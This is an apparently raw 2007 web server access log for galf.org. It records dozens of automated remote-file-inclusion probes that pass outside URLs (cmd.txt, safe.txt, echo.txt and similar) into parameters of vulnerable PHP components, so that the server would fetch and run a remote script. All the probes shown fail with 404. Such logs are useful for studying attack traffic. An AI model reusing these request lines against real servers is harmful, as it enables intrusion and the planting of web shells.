202.174.85.9 - - [29/Oct/2007:12:35:29 -0700] "GET /logs//include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:12:35:30 -0700] "GET //include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:12:36:06 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:12:36:06 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:12:36:17 -0700] "GET /logs//include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:12:36:17 -0700] "GET //include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
204.11.234.20 - - [29/Oct/2007:12:36:21 -0700] "GET /logs/access_071008.log/akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [29/Oct/2007:12:36:32 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [29/Oct/2007:12:36:32 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [29/Oct/2007:12:36:32 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:12:36:38 -0700] "GET //ppa/inc/functions.inc.php?config[ppa_root_path]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.73.171 - - [29/Oct/2007:12:36:38 -0700] "GET //ppa/inc/functions.inc.php?config[ppa_root_path]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:12:37:26 -0700] "GET /logs/middle.php?page=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:12:37:26 -0700] "GET /middle.php?page=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.92.73.80 - - [29/Oct/2007:12:37:57 -0700] "GET //teatro/pub/pub08_comments.php?basePath=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [29/Oct/2007:12:38:13 -0700] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.70.43 - - [29/Oct/2007:12:38:40 -0700] "GET /!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:12:40:02 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.111.45.30 - - [29/Oct/2007:12:40:13 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.158.132 - - [29/Oct/2007:12:40:24 -0700] "GET /logs/!scanhttp://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.158.132 - - [29/Oct/2007:12:40:24 -0700] "GET /!scanhttp://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.158.132 - - [29/Oct/2007:12:40:25 -0700] "GET /logs/!scanhttp://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.158.132 - - [29/Oct/2007:12:40:25 -0700] "GET /!scanhttp://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.29.70.43 - - [29/Oct/2007:12:40:33 -0700] "GET /logs/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.70.43 - - [29/Oct/2007:12:40:34 -0700] "GET /!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.70.43 - - [29/Oct/2007:12:40:37 -0700] "GET /logs/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.29.70.43 - - [29/Oct/2007:12:40:37 -0700] "GET /!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.158.132 - - [29/Oct/2007:12:41:08 -0700] "GET /logs/!scanhttp://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.158.132 - - [29/Oct/2007:12:41:08 -0700] "GET /!scanhttp://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:41:18 -0700] "GET /logs/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:41:18 -0700] "GET /!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:41:19 -0700] "GET /logs/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
83.141.132.21 - - [29/Oct/2007:12:41:19 -0700] "GET /!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
83.141.132.21 - - [29/Oct/2007:12:46:32 -0700] "GET /logs/access_070826.log/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:46:32 -0700] "GET /!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.141.132.21 - - [29/Oct/2007:12:46:32 -0700] "GET /logs/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:48:32 -0700] "GET /logs/access_070924.log/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.72 - - [29/Oct/2007:12:48:38 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:12:49:27 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:12:49:28 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.67.192.15 - - [29/Oct/2007:12:50:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [29/Oct/2007:12:50:21 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.92.73.80 - - [29/Oct/2007:12:50:52 -0700] "GET /logs/access.log//teatro/pub/pub08_comments.php?basePath=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.92.73.80 - - [29/Oct/2007:12:50:53 -0700] "GET /logs//teatro/pub/pub08_comments.php?basePath=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:51:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:51:06 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:12:52:20 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.67.192.15 - - [29/Oct/2007:12:52:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
61.67.192.15 - - [29/Oct/2007:12:52:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
61.67.192.15 - - [29/Oct/2007:12:52:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [29/Oct/2007:12:52:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:12:52:45 -0700] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:12:52:45 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.67.192.15 - - [29/Oct/2007:12:53:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [29/Oct/2007:12:53:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:53:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:12:53:28 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
61.67.192.15 - - [29/Oct/2007:12:53:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [29/Oct/2007:12:53:30 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coolpc.com.tw/evaluate/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.202.236.2 - - [29/Oct/2007:12:53:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.187.222 - - [29/Oct/2007:12:57:45 -0700] "GET /logs/index.php?p=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.187.222 - - [29/Oct/2007:12:57:45 -0700] "GET /index.php?p=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.92.73.80 - - [29/Oct/2007:12:57:56 -0700] "GET /logs/access_070903.log//teatro/pub/pub08_comments.php?basePath=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:58:29 -0700] "GET //teatro/pub/pub08_comments.php?basePath=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:00:42 -0700] "GET /logs/access_070924.log/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.158.132 - - [29/Oct/2007:13:00:45 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.158.132 - - [29/Oct/2007:13:00:45 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.158.132 - - [29/Oct/2007:13:00:46 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.158.132 - - [29/Oct/2007:13:00:46 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:01:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:01:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:01:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:01:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.142.210.125 - - [29/Oct/2007:13:01:39 -0700] "GET /logs/oneadmin/newspublish//include.php?path[docroot]=http://www.muslimphuket.org//modules/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.142.210.125 - - [29/Oct/2007:13:01:39 -0700] "GET /oneadmin/newspublish//include.php?path[docroot]=http://www.muslimphuket.org//modules/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:01:54 -0700] "GET /logs/access_070826.log/!scanhttp://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:13:02:30 -0700] "GET /index.php?go=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:03:23 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:03:23 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:13:03:47 -0700] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:13:03:47 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:13:05:42 -0700] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:13:06:03 -0700] "GET /logs/scripts.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:06:03 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:13:06:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:13:06:03 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:06:05 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:06:06 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:06:06 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:13:06:19 -0700] "GET /logs/access_070924.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:06:40 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:06:42 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:06:45 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:06:45 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:06:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.93.209.250 - - [29/Oct/2007:13:07:30 -0700] "GET /logs/access_070903.log//teatro/pub/pub08_comments.php?basePath=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:13:07:30 -0700] "GET /logs//teatro/pub/pub08_comments.php?basePath=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:07:40 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:07:40 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.135.32.79 - - [29/Oct/2007:13:07:40 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
200.21.133.2 - - [29/Oct/2007:13:07:44 -0700] "GET /logs/access_070826.log//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.scan-bot.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.21.133.2 - - [29/Oct/2007:13:07:46 -0700] "GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.scan-bot.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.141.132.21 - - [29/Oct/2007:13:07:46 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.21.133.2 - - [29/Oct/2007:13:07:48 -0700] "GET /logs//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.scan-bot.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:13:07:51 -0700] "GET /logs/access_070827.log//teatro/pub/pub08_comments.php?basePath=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:07:55 -0700] "GET /logs/access_071001.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.118.100.132 - - [29/Oct/2007:13:08:00 -0700] "GET /logs/index2.php?url_page=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.100.132 - - [29/Oct/2007:13:08:00 -0700] "GET /index2.php?url_page=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:08:21 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:08:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:08:21 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:08:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:08:21 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:13:08:26 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.32.79 - - [29/Oct/2007:13:08:39 -0700] "GET /logs/access_071001.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
87.118.100.132 - - [29/Oct/2007:13:09:47 -0700] "GET /logs/index2.php?url_page=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
